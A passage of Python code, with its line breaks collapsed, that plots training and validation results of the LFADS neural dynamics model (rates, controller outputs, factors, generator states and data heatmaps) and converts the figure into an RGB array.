vals_txn.shape if n_to_plot > N: n_to_plot = N plt.plot(vals_txn[:,0:n_to_plot] + scale*np.array(range(n_to_plot)), color=color, lw=1.0) plt.axis('tight') if title: plt.title(title) def plot_lfads_timeseries(data_bxtxn, model_vals, ext_input_bxtxi=None, truth_bxtxn=None, bidx=None, output_dist="poisson", conversion_factor=1.0, subplot_cidx=0, col_title=None): n_to_plot = 10 scale = 1.0 nrows = 7 plt.subplot(nrows,2,1+subplot_cidx) if output_dist == 'poisson': rates = means = conversion_factor * model_vals['output_dist_params'] plot_time_series(rates, bidx, n_to_plot=n_to_plot, scale=scale, title=col_title + " rates (LFADS - red, Truth - black)") elif output_dist == 'gaussian': means_vars = model_vals['output_dist_params'] means, vars = np.split(means_vars,2, axis=2) # bxtxn stds = np.sqrt(vars) plot_time_series(means, bidx, n_to_plot=n_to_plot, scale=scale, title=col_title + " means (LFADS - red, Truth - black)") plot_time_series(means+stds, bidx, n_to_plot=n_to_plot, scale=scale, color='c') plot_time_series(means-stds, bidx, n_to_plot=n_to_plot, scale=scale, color='c') else: assert 'NIY' if truth_bxtxn is not None: plot_time_series(truth_bxtxn, bidx, n_to_plot=n_to_plot, color='k', scale=scale) input_title = "" if "controller_outputs" in model_vals.keys(): input_title += " Controller Output" plt.subplot(nrows,2,3+subplot_cidx) u_t = model_vals['controller_outputs'][0:-1] plot_time_series(u_t, bidx, n_to_plot=n_to_plot, color='c', scale=1.0, title=col_title + input_title) if ext_input_bxtxi is not None: input_title += " External Input" plot_time_series(ext_input_bxtxi, n_to_plot=n_to_plot, color='b', scale=scale, title=col_title + input_title) 
plt.subplot(nrows,2,5+subplot_cidx) plot_time_series(means, bidx, n_to_plot=n_to_plot, scale=1.0, title=col_title + " Spikes (LFADS - red, Spikes - black)") plot_time_series(data_bxtxn, bidx, n_to_plot=n_to_plot, color='k', scale=1.0) plt.subplot(nrows,2,7+subplot_cidx) plot_time_series(model_vals['factors'], bidx, n_to_plot=n_to_plot, color='b', scale=2.0, title=col_title + " Factors") plt.subplot(nrows,2,9+subplot_cidx) plot_time_series(model_vals['gen_states'], bidx, n_to_plot=n_to_plot, color='g', scale=1.0, title=col_title + " Generator State") if bidx is not None: data_nxt = data_bxtxn[bidx,:,:].T params_nxt = model_vals['output_dist_params'][bidx,:,:].T else: data_nxt = np.mean(data_bxtxn, axis=0).T params_nxt = np.mean(model_vals['output_dist_params'], axis=0).T if output_dist == 'poisson': means_nxt = params_nxt elif output_dist == 'gaussian': # (means+vars) x time means_nxt = np.vsplit(params_nxt,2)[0] # get means else: assert "NIY" plt.subplot(nrows,2,11+subplot_cidx) plt.imshow(data_nxt, aspect='auto', interpolation='nearest') plt.title(col_title + ' Data') plt.subplot(nrows,2,13+subplot_cidx) plt.imshow(means_nxt, aspect='auto', interpolation='nearest') plt.title(col_title + ' Means') def plot_lfads(train_bxtxd, train_model_vals, train_ext_input_bxtxi=None, train_truth_bxtxd=None, valid_bxtxd=None, valid_model_vals=None, valid_ext_input_bxtxi=None, valid_truth_bxtxd=None, bidx=None, cf=1.0, output_dist='poisson'): # Plotting f = plt.figure(figsize=(18,20), tight_layout=True) plot_lfads_timeseries(train_bxtxd, train_model_vals, train_ext_input_bxtxi, truth_bxtxn=train_truth_bxtxd, conversion_factor=cf, bidx=bidx, output_dist=output_dist, col_title='Train') plot_lfads_timeseries(valid_bxtxd, valid_model_vals, valid_ext_input_bxtxi, truth_bxtxn=valid_truth_bxtxd, conversion_factor=cf, bidx=bidx, output_dist=output_dist, subplot_cidx=1, col_title='Valid') # Convert from figure to an numpy array width x height x 3 (last for RGB) f.canvas.draw() data = np.fromstring(f.canvas.tostring_rgb(), dtype=np.uint8, sep='') data_wxhx3 = data.reshape(f.canvas.get_width_height()[::-1] + (3,)) plt.close() return data_wxhx3
3,085